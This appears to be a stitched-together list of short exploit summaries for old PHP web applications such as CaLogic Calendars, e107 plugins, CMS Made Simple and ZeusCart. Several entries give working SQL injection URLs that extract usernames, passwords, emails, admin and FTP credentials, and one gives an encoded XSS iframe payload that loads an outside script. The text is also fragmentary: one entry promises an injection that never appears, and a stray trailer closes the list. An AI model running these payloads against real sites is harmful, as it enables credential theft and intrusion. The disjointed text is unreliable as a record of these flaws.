CaLogic Calendars V1.2.2 is vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the database and execute arbitrary SQL queries.
The application is vulnerable to XSS and SQL Injection. An attacker can inject malicious code in the application by using the URL http://[target]/[path]/profile.php?action=show&userid=%22%3E%3C%69%66%72%61%6D%65%20%73%72%63%D%68%74%74%70%3A%2F%2F%68%61%2E%63%6B%65%72%73%2E%6F%72%67%2F%73%63%72%69%70%74%6C%65%74%2E%68%74%6D%6C%3C. An attacker can also use the SQL injection vulnerability to gain access to the application's database by using the URL http://[target]/[path]/profile.php?action=show&saction=moreinfo&userid=-1+UNION+SELECT+1,concat(username,0x3a,password,0x3a,email)+FROM+wgcc_user--. There are also other URLs which can be used to exploit the SQL injection vulnerability.
Zogo-shop 1.16 Beta 13 & e-107 Zozo-shop Plugins are vulnerable to a remote SQL injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.
The vulnerability exists in the comment.php file of the e107 Plugin BLOG Engine v2.2. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The attacker can use the 'rid' parameter to inject malicious SQL code into the query. The attacker can use the 'and 1=1--' and 'and 1=2--' strings to check if the query is valid. The attacker can also use the 'substring(@@version,1,1)=4' string to check the MySQL version. The attacker can use the sqlmap tool to exploit this vulnerability.
EQDKP 1.3.2f is vulnerable to an authentication bypass vulnerability. By crafting a malicious cookie, an attacker can bypass authentication and gain access to the application. This vulnerability is due to the application not properly validating user-supplied input.
A vulnerability in Advanced Image Host Script (AIH) v2.1 allows an attacker to execute arbitrary SQL commands via the 'id' parameter in a 'view.php' script.
CMS Made Simple version 1.2.4 and below is vulnerable to an arbitrary file upload vulnerability due to a lack of proper input validation in the FileManager module. An attacker can upload a malicious file to the server by bypassing the file extension check in the javaUpload.php script. This can be done by setting the $allow_or_deny_method variable to 'allow' and leaving the $file_extension_list array empty.
Register an account, login and go to /members.php?folders=1 and create a folder with any name. Exploitation options include: ADIM 1: /members.php?folders=1&fid=-1+union+all+select+1,2,concat(user,0x3a,email),pass,5,6,7,8+from+users+-- to get the users; ADIM 2: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,admin,pass,5,6,7,8+from+setting+-- to get the admin info; ADIM 3: Go to /members.php?folders=1&fid=-1+union+all+select+1,2,user,pass,5,6,7,8+from+server+-- to get the ftp server info (if its configured).
Battle.net Clan Script version 1.5.x is vulnerable to a remote SQL injection vulnerability. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'showmember' parameter of the 'members' page. An attacker can exploit this vulnerability to execute arbitrary SQL commands in the application's back-end database, allowing them to access or modify sensitive data.
ZeusCart (from AJ E-Commerce) suffers from a insecure mysql query, This allows the remote attacker to arbitrary execute mysql code/querys. The below injection will perform a SELECT query which will display admin credentials in RED text.
Services By CQR